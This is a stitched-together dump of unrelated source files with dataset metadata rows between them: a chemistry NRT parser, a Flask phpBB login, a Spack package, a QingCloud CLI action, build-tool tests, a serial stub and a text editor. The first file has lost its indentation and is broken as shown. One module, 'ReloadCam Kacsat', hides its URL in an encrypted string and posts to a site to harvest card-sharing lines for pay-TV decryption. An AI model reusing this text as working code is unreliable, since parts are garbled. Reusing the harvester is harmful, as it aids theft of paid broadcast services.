def CountValenceEl(x):
"""
    Returns the number of valence electrons for an atom with x electrons in total.
"""
x = int(x)
nmax = int(sqrt(x/2))
val = x
for i in range(nmax+1):
n = 2*i*i
if n < val:
val -= n
return val
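# Example values, following directly from the loop above:
#   CountValenceEl(1)  -> 1   (H)
#   CountValenceEl(6)  -> 4   (C)
#   CountValenceEl(8)  -> 6   (O)
#   CountValenceEl(16) -> 6   (S)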
class NRT(Top):
"""
This class represents a collection of resonance structures.
"""
def __init__(self):
self.FI = None
self.options = ''
self.NBO_version = ''
self.structures = []
self.symbols = []
def parse(self):
if self.FI:
FI = self.FI
else:
FI = BetterFile(self.file)
def read(self, fInp='',fType=''):
if fType=='matrix':
self.read_matrix(fInp)
elif fType=='lines':
self.read_lines(fInp)
elif not self.read_matrix(fInp):
self.read_lines(fInp)
def __str__(self):
return self.as_lines()
def __len__(self):
return len(self.structures)
def __getitem__(self,key):
return self.structures[key]
def write(self,file):
f = open(file,'w')
f.write(str(self))
f.close()
def sortByWg(self):
"""
Sorts resonance structures by weight in descending order
"""
self.structures = sorted(self.structures, key = lambda k: k.wg, reverse = True)
def as_lines(self):
"""
Returns a string with resonance structures written as in the end of .nbout file
"""
s = " $NRTSTR\n"
if self.symbols:
s = s + " !SYMBOLS " + str(self.symbols) + "\n"
for rs in self.structures:
s = s + rs.as_lines()
return s + " $END\n"
"""
*
"""
def totalWg(self):
"""
Returns sum of weights of resonance structures
"""
sm = 0
for mtrx in self.structures:
sm += mtrx.wg
return sm
"""
*
"""
def byName(self,name):
"""
Returns a resonance structure (instance of class bondM) with a given name
"""
for rs in self.structures:
if rs.name == name:
return rs
"""
*
"""
def patternsOfSubset(self,subset,OffDiag = False):
"""
Returns connectivity patterns for a given subset of atoms.
Weights of these patterns are calculated.
"""
Patterns = SetOfResStr()
for i_mtrx in range(len(self.structures)):
mtrx = self.structures[i_mtrx]
if OffDiag:
currMat = mtrx.subset(subset).offDiag()
else:
currMat = mtrx.subset(subset)
if currMat in Patterns.structures:
i = Patterns.structures.index(currMat)
Patterns.structures[i].wg += mtrx.wg
Patterns.structures[i].indices.append(i_mtrx)
else:
Patterns.structures.append(currMat)
Patterns.structures[-1].wg = mtrx.wg
Patterns.structures[-1].indices = [i_mtrx,]
"""
for mtrx in self.structures:
if OffDiag:
currMat = mtrx.subset(subset).offDiag()
else:
currMat = mtrx.subset(subset)
if currMat in Patterns.structures:
i = Patterns.structures.index(currMat)
Patterns.structures[i].wg += mtrx.wg
else:
Patterns.structures.append(currMat)
Patterns.structures[-1].wg = mtrx.wg
"""
return Patterns
"""
*
"""
def getWeights(self,NBO_RS):
"""
Updates weights of reference structures, if they are found in NBO_RS
:param NBO_RS: an object of class SetOfResStr, where resonance structures will be looked for.
"""
for mtrx in self.structures:
mtrx.wg = 0
if mtrx in NBO_RS.structures:
iPat = NBO_RS.structures.index(mtrx)
mtrx.wg = NBO_RS.structures[iPat].wg
mtrx.indices = NBO_RS.structures[iPat].indices
"""
*
"""
def offDiag(self):
"""
Returns an instance of SetOfResStr class with zeroed diagonal elements of resonance structure matrices
(in other words, with lone pairs removed)
"""
od = copy.deepcopy(self)
for i in range(len(self.structures)):
od.structures[i] = self.structures[i].offDiag()
return od
"""
*
"""
def read_matrix(self,fInp = ''):
"""
        Reads the resonance structures. Handles split TOPO matrices; first determines the number of atoms.
"""
if fInp:
try:
inp = open(fInp,'r')
except:
print '[Warning]: cannot open %s' % (fInp)
return
else:
inp = sys.stdin
s = inp.readline()
while s:
if "Atom distance matrix:" in s:
break
s = inp.readline()
inp.readline()
inp.readline()
inp.readline()
nAtoms = 0
s = inp.readline()
while s:
# atom numbers go like "1." so they must convert into a float, if not then we are done
try:
float(s.split()[0])
except:
break
nAtoms += 1
s = inp.readline()
# read the main structure
main = bondM(nAtoms,[],[])
s = inp.readline()
while s:
if "TOPO matrix for" in s:
break
s = inp.readline()
inp.readline()
atomsPerLine = len(inp.readline().split()) -1
nPasses = int(math.ceil(float(nAtoms)/atomsPerLine))
inp.readline()
for aPass in range(nPasses):
for i in range(nAtoms):
L = inp.readline().split()
main.symbols[i]=L[1]
for j in range(len(L)-2):
main[i][aPass*atomsPerLine+j] = int(L[j+2])
if aPass < nPasses - 1:
inp.readline()
inp.readline()
inp.readline()
s = inp.readline()
while s:
if "---------------------------" in s:
break
s = inp.readline()
# here comes the parsing of the other structs
# the main first , just the %
line = inp.readline()
try:
main.wg = float(line[10:17])
except:
return False
struct_lns = []
line = inp.readline()
while line:
if "---------------------------" in line:
break
if line[4] == " ":
struct_lns[-1] += line.strip("\n")[18:]
else:
struct_lns.append(line.strip("\n"))
line = inp.readline()
allStructs = []
allStructs.append(main)
for tStr in struct_lns:
tmpM = copy.deepcopy(main)
tmpM.wg = float(tStr[10:17])
#print tStr
dontInclude = False
for mod in tStr[18:].split(','):
mod = mod.strip()
if len(mod.split()) == 0:
dontInclude = True
break
increment = 0
if mod[0] == "(":
increment -= 1
aList = mod.strip("()").split("-")
else:
increment += 1
aList = mod.split("-")
aL2 = []
for aL in aList:
aL2.append(int(aL.strip(string.letters+" "))-1)
if len(aL2) == 2:
tmpM[aL2[0]][aL2[1]] += increment
tmpM[aL2[1]][aL2[0]] += increment
elif len(aL2) == 1:
tmpM[aL2[0]][aL2[0]] += increment
if not dontInclude:
allStructs.append(tmpM)
self.structures = allStructs
if allStructs:
return True
else:
return False
#
# Done reading the reson structs.
#
"""
*
"""
def read_lines(self,fInp=''):
"""
Reads NRT strings given in the format of $NRTSTR, $CHOOSE groups
"""
allStructs = []
if fInp:
inp = open(fInp,'r')
else:
inp = sys.stdin
BondTypes = {'S':1,'D':2,'T':3}
NAtoms = 0
inside = False
while True:
s = inp.readline().strip('\n')
if not s:
break
if "$END" in s:
continue
if "STR" in s:
inside = True
LP, Bonds, props = {}, {}, {}
if "!" in s:
all_params = s.split('!')[1]
for param in all_params.split(','):
name_value = param.split('=')
if len(name_value)>1:
props[name_value[0].strip()] = name_value[1].strip()
continue
if inside and "LONE" in s:
tmp = s.split()
for i in range(1,len(tmp)-1,2):
LP[tmp[i]] = tmp[i+1]
NAtoms = max(NAtoms,int(tmp[i]))
#print "Lone Pairs:\n",LP
continue
if inside and "BOND" in s:
tmp = s.split()
for i in range(1,len(tmp)-1,3):
#print tmp,i
#print tmp[i],tmp[i+1],tmp[i+2]
BondType, smaller, higher = tmp[i], tmp[i+1],tmp[i+2]
NAtoms = max(NAtoms,int(higher))
if not higher in Bonds:
Bonds[higher] = {}
Bonds[higher][smaller]=BondType
continue
if "END" in s:
inside = False
# Fill data
data = numpy.zeros((NAtoms,NAtoms))
for i in LP:
data[int(i)-1,int(i)-1] = LP[i]
for i in Bonds:
for j in Bonds[i]:
ii = int(i) -1
jj = int(j) -1
data[ii,jj] = BondTypes[Bonds[i][j]]
data[jj,ii] = data[ii,jj]
ResStr = bondM(NAtoms,symbols=[],data=data)
if 'name' in props:
ResStr.name = props['name']
if 'symbols' in props:
ResStr.applyStringSymbols(props['symbols'])
if 'weight' in props:
ResStr.wg = float(props['weight'])
allStructs.append(ResStr)
self.structures = allStructs
if __name__ == "__main__":
DebugLevel = logging.DEBUG
logging.basicConfig(level=DebugLevel)
from Settings import Settings
Top.settings = Settings(FromConfigFile = True)
f = NRT()
f.file = sys.argv[1]
f.parse()
print f
| mit | 3,443,818,888,662,613,500 | 28.625 | 117 | 0.438737 | false |
ser/topitup | login_bp.py | 1 | 3595 | # Flask modules
from flask import (
Blueprint,
render_template,
redirect,
url_for,
request,
flash,
g
)
# FLask Login
from flask_login import (
login_user,
logout_user,
current_user
)
# WTForms
from flask_wtf import Form, RecaptchaField
from wtforms import StringField, SubmitField, PasswordField, BooleanField
from wtforms.validators import DataRequired
# Import password / encryption helper tools
# AVOID flask-bcrypt extension, it does not work with python 3.x
import bcrypt
# our own modules
from topitup import db
from nav import (
nav,
top_nav
)
# Let's start!
login_bp = Blueprint('login_bp', __name__)
# Structure of User data located in phpBB
class User(db.Model):
__tablename__ = "phpbb_users"
id = db.Column('user_id', db.Integer, primary_key=True)
username = db.Column('username_alias', db.String(63),
unique=True, index=True)
password = db.Column('user_password', db.String(255))
email = db.Column('user_email', db.String(100), unique=True, index=True)
posts = db.Column('user_posts', db.Integer)
avatar = db.Column('user_avatar', db.String(255))
neuro = db.Column('neuro', db.Numeric(12, 2))
def __init__(self, username, password, email, posts, avatar, neuro):
self.username = username
self.password = password
self.email = email
self.posts = posts
self.avatar = avatar
self.neuro = neuro
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return self.id
def __repr__(self):
return '<User %r>' % (self.username)
# Login Form
class LoginForm(Form):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('Remember me')
recaptcha = RecaptchaField('Spam protection')
submit = SubmitField("Log me in")
@login_bp.before_request
def before_request():
try:
g.user = current_user.username.decode('utf-8')
g.email = current_user.email.decode('utf-8')
# amount of Credits in user's account
g.credits = current_user.neuro
g.user_id = current_user.id
except:
g.user = None
g.credits = None
nav.register_element('top_nav', top_nav(g.user, g.credits))
@login_bp.route('/login', methods=('GET', 'POST'))
def index():
form = LoginForm()
if form.validate_on_submit():
username = request.form['username']
password = request.form['password']
password = password.encode('utf-8') # required by bcrypt
remember_me = False
if 'remember_me' in request.form:
remember_me = True
try:
sql_user_query = User.query.filter_by(username=username).first()
pwhash = sql_user_query.password.decode('utf-8')
pwhash = pwhash.encode('utf-8') # required by bcrypt
userid = sql_user_query.id
if userid and bcrypt.hashpw(password, pwhash) == pwhash:
login_user(sql_user_query, remember=remember_me)
flash('Logged in successfully', 'info')
return redirect('/')
except:
flash('Username or Password is invalid', 'error')
return redirect('/login')
return render_template('login.html', form=form)
@login_bp.route('/logout')
def logout():
logout_user()
return redirect(url_for('frontend.index'))
| agpl-3.0 | 2,974,913,591,940,286,500 | 26.234848 | 76 | 0.624478 | false |
lgarren/spack | var/spack/repos/builtin/packages/eccodes/package.py | 1 | 4223 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
#
from spack import *
class Eccodes(CMakePackage):
"""ecCodes is a package developed by ECMWF for processing meteorological
data in GRIB (1/2), BUFR (3/4) and GTS header formats."""
homepage = "https://software.ecmwf.int/wiki/display/ECC/ecCodes+Home"
url = "https://software.ecmwf.int/wiki/download/attachments/45757960/eccodes-2.2.0-Source.tar.gz?api=v2"
list_url = "https://software.ecmwf.int/wiki/display/ECC/Releases"
version('2.5.0', '5a7e92c58418d855082fa573efd352aa')
version('2.2.0', 'b27e6f0a3eea5b92dac37372e4c45a62')
variant('netcdf', default=False,
description='Enable GRIB to NetCDF conversion tool')
variant('jp2k', default='openjpeg', values=('openjpeg', 'jasper', 'none'),
description='Specify JPEG2000 decoding/encoding backend')
variant('png', default=False,
description='Enable PNG support for decoding/encoding')
variant('aec', default=False,
description='Enable Adaptive Entropy Coding for decoding/encoding')
variant('pthreads', default=False,
description='Enable POSIX threads')
variant('openmp', default=False,
description='Enable OpenMP threads')
variant('memfs', default=False,
description='Enable memory based access to definitions/samples')
variant('python', default=False,
description='Enable the Python interface')
variant('fortran', default=True, description='Enable the Fortran support')
variant('build_type', default='RelWithDebInfo',
description='The build type to build',
values=('Debug', 'Release', 'RelWithDebInfo', 'Production'))
depends_on('netcdf', when='+netcdf')
depends_on('openjpeg', when='jp2k=openjpeg')
depends_on('jasper', when='jp2k=jasper')
depends_on('libpng', when='+png')
depends_on('libaec', when='+aec')
depends_on('python@:2', when='+python')
depends_on('py-numpy', when='+python', type=('build', 'run'))
extends('python', when='+python')
conflicts('+openmp', when='+pthreads',
msg='Cannot enable both POSIX threads and OMP')
# The following enforces linking against the specified JPEG2000 backend.
patch('enable_only_openjpeg.patch', when='jp2k=openjpeg')
patch('enable_only_jasper.patch', when='jp2k=jasper')
def cmake_args(self):
variants = ['+netcdf', '+png', '+aec', '+pthreads',
'+openmp', '+memfs', '+python', '+fortran']
options = ['NETCDF', 'PNG', 'AEC', 'ECCODES_THREADS',
'ECCODES_OMP_THREADS', 'MEMFS', 'PYTHON', 'FORTRAN']
        # use a list comprehension (not map) so that args.append() below also works on Python 3,
        # where map() returns an iterator without an append() method
        args = ["-DENABLE_%s=%s" %
                (opt, 'ON' if var in self.spec else 'OFF')
                for var, opt in zip(variants, options)]
if self.spec.variants['jp2k'].value == 'none':
args.append('-DENABLE_JPG=OFF')
else:
args.append('-DENABLE_JPG=ON')
return args
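    # For illustration only: with a hypothetical spec such as "eccodes+netcdf+fortran jp2k=openjpeg",
    # the list returned above would contain flags like -DENABLE_NETCDF=ON, -DENABLE_PNG=OFF,
    # -DENABLE_FORTRAN=ON and, from the jp2k branch, -DENABLE_JPG=ON.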
| lgpl-2.1 | 7,285,572,141,602,078,000 | 43.925532 | 113 | 0.636514 | false |
DaggerES/ReloadCam | DELETED_ReloadCam_Server_Kacsat.py | 1 | 1301 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#Automatic cline refresher
#Created by Dagger - https://github.com/gavazquez
import ReloadCam_Main, ReloadCam_Helper
def GetVersion():
return 3
#Filename must start with Server, classname and argument must be the same!
class Kacsat(ReloadCam_Main.Server):
def GetUrl(self):
        #Put a breakpoint here if you want to see the real URL ;)
#http://kac-sat.noip.me/index.php
realUrl = ReloadCam_Helper.Decrypt("maanpH1wfN3Gz5zUxaVgoaOssXvfypvYz8iWqmGkq7E=")
return realUrl
def GetClines(self):
print "Now getting Kacsat clines!"
kacsatClines = []
kacsatClines.append(self.__GetKacsatCline())
kacsatClines = filter(None, kacsatClines)
if len(kacsatClines) == 0: print "No Kacsat lines retrieved"
return kacsatClines
def __GetKacsatCline(self):
values= {
'user': ReloadCam_Helper.GetMyIP(),
'pass': 'hack-sat.net',
'submit':'Active+User%21'
}
htmlCode = ReloadCam_Helper.GetPostHtmlCode(values, None, self.GetUrl())
cline = ReloadCam_Helper.FindStandardClineInText(htmlCode)
if cline != None and ReloadCam_Helper.TestCline(cline):
return cline
return None
| gpl-3.0 | 1,889,748,658,797,407,500 | 30.731707 | 90 | 0.652575 | false |
yunify/qingcloud-cli | qingcloud/cli/iaas_client/actions/lb/modify_loadbalancer_backend_attributes.py | 1 | 2590 | # =========================================================================
# Copyright 2012-present Yunify, Inc.
# -------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
from qingcloud.cli.iaas_client.actions.base import BaseAction
class ModifyLoadBalancerBackendAttributesAction(BaseAction):
action = 'ModifyLoadBalancerBackendAttributes'
command = 'modify-loadbalancer-backend-attributes'
usage = '%(prog)s -b <lb_backend> [-p <port> -w <weight> -f <conf_file>]'
description = 'Modify load balancer backend attributes.'
@classmethod
def add_ext_arguments(cls, parser):
parser.add_argument('-b', '--lb_backend', dest='lb_backend',
action='store', type=str, default='',
help='the ID of load balancer backend.')
parser.add_argument('-p', '--port', dest='port',
action='store', type=int, default=None,
help='the backend port.')
parser.add_argument('-w', '--weight', dest='weight',
action='store', type=int, default=None,
help='the backend weight, valid value is from 1 to 100.')
parser.add_argument('--disabled', dest='disabled',
action='store', type=int, default=None,
help='disable this backend or not, 0: enable, 1: disable.')
parser.add_argument('-N', '--name', dest='name',
action='store', type=str, default=None,
help='new backend name')
@classmethod
def build_directive(cls, options):
if not options.lb_backend:
print('error: backend should be specified')
return None
return {
'loadbalancer_backend': options.lb_backend,
'loadbalancer_backend_name': options.name,
'port': options.port,
'weight': options.weight,
'disabled': options.disabled,
}
| apache-2.0 | -2,008,896,815,739,194,600 | 41.459016 | 77 | 0.57027 | false |
ltilve/chromium | tools/mb/mb_unittest.py | 1 | 4852 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for mb.py."""
import json
import sys
import unittest
import mb
class FakeMBW(mb.MetaBuildWrapper):
def __init__(self):
super(FakeMBW, self).__init__()
self.files = {}
self.calls = []
self.out = ''
self.err = ''
self.platform = 'linux2'
self.chromium_src_dir = '/fake_src'
self.default_config = '/fake_src/tools/mb/mb_config.pyl'
def ExpandUser(self, path):
return '$HOME/%s' % path
def Exists(self, path):
return self.files.get(path) is not None
def ReadFile(self, path):
return self.files[path]
def WriteFile(self, path, contents):
self.files[path] = contents
def Call(self, cmd):
self.calls.append(cmd)
return 0, '', ''
def Print(self, *args, **kwargs):
sep = kwargs.get('sep', ' ')
end = kwargs.get('end', '\n')
f = kwargs.get('file', sys.stdout)
if f == sys.stderr:
self.err += sep.join(args) + end
else:
self.out += sep.join(args) + end
class IntegrationTest(unittest.TestCase):
def test_validate(self):
# Note that this validates that the actual mb_config.pyl is valid.
ret = mb.main(['validate', '--quiet'])
self.assertEqual(ret, 0)
TEST_CONFIG = """\
{
'common_dev_configs': ['gn_debug'],
'configs': {
'gyp_rel_bot': ['gyp', 'rel', 'goma'],
'gn_debug': ['gn', 'debug'],
'gn_rel_bot': ['gn', 'rel', 'goma'],
'private': ['gyp', 'fake_feature1'],
'unsupported': ['gn', 'fake_feature2'],
},
'masters': {
'fake_master': {
'fake_builder': 'gyp_rel_bot',
'fake_gn_builder': 'gn_rel_bot',
},
},
'mixins': {
'fake_feature1': {
'gn_args': 'enable_doom_melon=true',
'gyp_defines': 'doom_melon=1',
},
'fake_feature2': {
'gn_args': 'enable_doom_melon=false',
'gyp_defaults': 'doom_melon=0',
},
'gyp': {'type': 'gyp'},
'gn': {'type': 'gn'},
'goma': {
'gn_args': 'use_goma=true goma_dir="$(goma_dir)"',
'gyp_defines': 'goma=1 gomadir="$(goma_dir)"',
},
'rel': {
'gn_args': 'is_debug=false',
'gyp_config': 'Release',
},
'debug': {
'gn_args': 'is_debug=true',
},
},
'private_configs': ['private'],
'unsupported_configs': ['unsupported'],
}
"""
class UnitTest(unittest.TestCase):
def fake_mbw(self, files):
mbw = FakeMBW()
if files:
for path, contents in files.items():
mbw.files[path] = contents
mbw.files.setdefault(mbw.default_config, TEST_CONFIG)
return mbw
def check(self, args, mbw=None, files=None, out=None, err=None, ret=None):
if not mbw:
mbw = self.fake_mbw(files)
mbw.ParseArgs(args)
actual_ret = mbw.args.func()
if ret is not None:
self.assertEqual(actual_ret, ret)
if out is not None:
self.assertEqual(mbw.out, out)
if err is not None:
self.assertEqual(mbw.err, err)
return mbw
def test_gn_analyze(self):
files = {'/tmp/in.json': """{\
"files": ["foo/foo_unittest.cc"],
"targets": ["foo_unittests", "bar_unittests"]
}"""}
mbw = self.fake_mbw(files)
mbw.Call = lambda cmd: (0, 'out/Default/foo_unittests\n', '')
self.check(['analyze', '-c', 'gn_debug', '//out/Default',
'/tmp/in.json', '/tmp/out.json'], mbw=mbw, ret=0)
out = json.loads(mbw.files['/tmp/out.json'])
self.assertEqual(out, {
'status': 'Found dependency',
'targets': ['foo_unittests'],
'build_targets': ['foo_unittests']
})
def test_gyp_analyze(self):
self.check(['analyze', '-c', 'gyp_rel_bot', '//out/Release',
'/tmp/in.json', '/tmp/out.json'],
ret=0)
def test_gen(self):
self.check(['gen', '-c', 'gn_debug', '//out/Default'], ret=0)
self.check(['gen', '-c', 'gyp_rel_bot', '//out/Release'], ret=0)
def test_goma_dir_expansion(self):
self.check(['lookup', '-c', 'gyp_rel_bot', '-g', '/foo'], ret=0,
out=("python build/gyp_chromium -G 'output_dir=<path>' "
"-G config=Release -D goma=1 -D gomadir=/foo\n"))
self.check(['lookup', '-c', 'gn_rel_bot', '-g', '/foo'], ret=0,
out=("/fake_src/buildtools/linux64/gn gen '<path>' "
"'--args=is_debug=false use_goma=true "
"goma_dir=\"/foo\"'\n" ))
def test_help(self):
self.assertRaises(SystemExit, self.check, ['-h'])
self.assertRaises(SystemExit, self.check, ['help'])
self.assertRaises(SystemExit, self.check, ['help', 'gen'])
def test_lookup(self):
self.check(['lookup', '-c', 'gn_debug'], ret=0)
def test_validate(self):
self.check(['validate'], ret=0)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | -1,060,539,262,879,962,600 | 27.209302 | 76 | 0.561006 | false |
mbuesch/pyprofibus | stublibs/serial.py | 1 | 2414 | from pyprofibus.compat import *
import time
PARITY_EVEN = "E"
PARITY_ODD = "O"
STOPBITS_ONE = 1
STOPBITS_TWO = 2
class SerialException(Exception):
pass
class Serial(object):
def __init__(self):
self.__isMicropython = isMicropython
self.port = "/dev/ttyS0"
self.__portNum = None
self.baudrate = 9600
self.bytesize = 8
self.parity = PARITY_EVEN
self.stopbits = STOPBITS_ONE
self.timeout = 0
self.xonxoff = False
self.rtscts = False
self.dsrdtr = False
self.__lowlevel = None
def open(self):
if self.__isMicropython:
port = self.port
for sub in ("/dev/ttyS", "/dev/ttyUSB", "/dev/ttyACM", "COM", "UART", ):
port = port.replace(sub, "")
try:
self.__portNum = int(port.strip())
except ValueError:
raise SerialException("Invalid port: %s" % self.port)
try:
import machine
self.__lowlevel = machine.UART(
self.__portNum,
self.baudrate,
self.bytesize,
0 if self.parity == PARITY_EVEN else 1,
1 if self.stopbits == STOPBITS_ONE else 2)
print("Opened machine.UART(%d)" % self.__portNum)
except Exception as e:
raise SerialException("UART%d: Failed to open:\n%s" % (
self.__portNum, str(e)))
return
raise NotImplementedError
def close(self):
if self.__isMicropython:
try:
if self.__lowlevel is not None:
self.__lowlevel.deinit()
self.__lowlevel = None
print("Closed machine.UART(%d)" % self.__portNum)
except Exception as e:
raise SerialException("UART%d: Failed to close:\n%s" % (
self.__portNum, str(e)))
return
raise NotImplementedError
def write(self, data):
if self.__isMicropython:
try:
self.__lowlevel.write(data)
except Exception as e:
raise SerialException("UART%d write(%d bytes) failed: %s" % (
self.__portNum, len(data), str(e)))
return
raise NotImplementedError
def read(self, size=1):
if self.__isMicropython:
try:
data = self.__lowlevel.read(size)
if data is None:
return b""
return data
except Exception as e:
raise SerialException("UART%d read(%d bytes) failed: %s" % (
self.__portNum, size, str(e)))
raise NotImplementedError
def flushInput(self):
if self.__isMicropython:
while self.__lowlevel.any():
self.__lowlevel.read()
return
raise NotImplementedError
def flushOutput(self):
if self.__isMicropython:
time.sleep(0.01)
return
raise NotImplementedError
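# Usage sketch (MicroPython target assumed; the port string is reduced to a UART number,
# so "UART2", "/dev/ttyS2" or "COM2" all map to machine.UART(2)):
#   ser = Serial()
#   ser.port = "UART2"
#   ser.baudrate = 19200
#   ser.open()
#   ser.write(b"\x68\x05")
#   reply = ser.read(8)
#   ser.close()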
| gpl-2.0 | 8,178,868,719,447,884,000 | 23.886598 | 75 | 0.652444 | false |
cgroza/gEcrit | gEcrit.py | 1 | 29353 | # Copyright (C) 2011 Groza Cristian
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#!/usr/bin/python
# -*- coding: utf-8 -*-
import wx.lib.inspection
import sys, types
import collections
from Configuration import *
from Logger import *
from AboutWindow import *
from SyntaxHighlight import *
from ConfigWindow import *
from PrettyPrinter import *
from FindReplaceText import *
from AutoComplet import *
from StcTextCtrl import *
from Menu import *
from Toolbar import *
from gEcritPluginManager import *
from yapsy.PluginManager import PluginManager
from data.plugins.categories import *
from AuiNoteBook import *
from gEcritSession import *
import Exceptions
import wx.aui
import gettext
import logging
logging.basicConfig(level=logging.DEBUG)
class gEcrit(wx.Frame):
"""
Editor
This class is the entry point in the program.
It creates all the user interface and initializes
the required objects and classes.
    Functions that cannot go into other objects
    for various reasons go here.
"""
def dummy_tr(self, tr):
return tr
def __init__(self, id, parent):
"""
__init__
Creates the user interface.
        Initializes the terminals if enabled.
Creates the required GUI and non GUI objects.
"""
BOTTOMPANEL_ID = 4002
SIDEPANEL_ID = 3999
try:
self.presLang = gettext.translation("gEcrit", "./locale")
self._ = self.presLang.ugettext
self.presLang.install()
except:
print("Translation for local language not found.")
self._ = self.dummy_tr
pathname = os.path.abspath(os.path.dirname((sys.argv)[0])) # Finding where
os.chdir(pathname) # gEcrit is running
        #Setting up the plugin environment
self.general_plugins = {}
self.passive_plugins = {}
self.plugin_manager = PluginManager(
categories_filter={"General": General,
"Passives" : Passive})
        #Sets the YAPSY plugin directory.
self.plugin_path = os.path.join(pathname, "data", "plugins")
self.plugin_manager.setPluginPlaces([self.plugin_path])
self.plugin_manager.locatePlugins()
#self.plugin_manager.collectPlugins()
self.plugin_manager.loadPlugins()
self.activated_plugins = Config.GetOption("ActivePlugins")
#populating the general plugin index
for f in self.plugin_manager.getPluginsOfCategory("General"):
if f.plugin_object.name in self.activated_plugins:
self.general_plugins[f.plugin_object.name] = f.plugin_object
#the passive plugins now
for p in self.plugin_manager.getPluginsOfCategory("Passives"):
if p.plugin_object.name in self.activated_plugins:
self.passive_plugins[p.plugin_object.name] = p.plugin_object
self.id_range = []
#getting the command line file argument
if "gEcrit.py" not in (sys.argv)[-1]:
target_file = os.path.normpath(os.path.realpath(sys.argv[-1]))
#no file was provided
else:
target_file = None
wx.Frame.__init__(self, parent, 1000, 'gEcrit', size=(700, 600))
self.Bind(wx.EVT_CLOSE, self.OnQuit)
#this object will handle layout and docking/undocking of widgets
self.aui_manager = wx.aui.AuiManager(self)
#creating the status bar
self.status_bar = self.CreateStatusBar()
self.status_bar.SetStatusText("Done")
self.status_bar.SetFieldsCount(3)
self.status_bar.SetId(999)
if not Config.GetOption("StatusBar"):
self.status_bar.Hide()
self.menubar = MainMenu(self)
self.SetMenuBar(self.menubar)
#setting the application icon
self.SetIcon(wx.Icon('icons/gEcrit.png', wx.BITMAP_TYPE_PNG))
#this variable is incremented each time we create a StcControl
self.text_id = 0
#finding the user home folder
self.HOMEDIR = os.path.expanduser('~')
os.chdir(os.path.abspath(self.HOMEDIR))
#creating a plugin manager instance
self.plugin_conf_manager = gEcritPluginManager(self)
#creating the left side notebook
self.side_notebook = wx.aui.AuiNotebook(self, id=SIDEPANEL_ID, size=(-1,-1),
style=wx.BORDER_SUNKEN|wx.aui.AUI_NB_TAB_SPLIT|wx.aui.AUI_NB_TAB_MOVE|wx.aui.AUI_NB_SCROLL_BUTTONS )
#creating the bottom side notebook
self.bottom_notebook = wx.aui.AuiNotebook(self, id=BOTTOMPANEL_ID, size=(-1,
-1), style=wx.BORDER_SUNKEN|wx.aui.AUI_NB_TAB_SPLIT|wx.aui.AUI_NB_TAB_MOVE|wx.aui.AUI_NB_SCROLL_BUTTONS )
#the aui notebook that will manage editor tabs
self.nb = AuiNoteBook(parent = self)
#going back to application running point
os.chdir(pathname)
#binding the menubar events
f = wx.FindWindowById
self.Bind(wx.EVT_MENU, lambda event: self.NewTab(event,
"New Document", "New Document"), id=500)
self.Bind(wx.EVT_MENU, lambda event: self.OnOpenFile(event), id=
501)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).Save(event),
id=502)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).SaveAs(event),
id=503)
self.Bind(wx.EVT_MENU, self.OnPrint,id=504)
self.Bind(wx.EVT_MENU, lambda event: self.OnMenuCloseTab(event,
(self.id_range)[self.nb.GetSelection()]), id=505)
self.Bind(wx.EVT_MENU, lambda event: self.OnQuit(event), id=506)
self.Bind(wx.EVT_MENU, self.SaveAll, id=563)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnReload(event),id = 507)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnUndo(event),
id=520)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnRedo(event),
id=521)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnCut(event),
id=522)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnCopy(event),
id=523)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnPaste(event),
id=524)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnSelectAll(event),
id=525)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnSelectCodeBlock(event),
id=562)
self.Bind(wx.EVT_MENU, lambda event: f((self.id_range)[self.nb.GetSelection()]).OnInsertDate(event),
id=526)
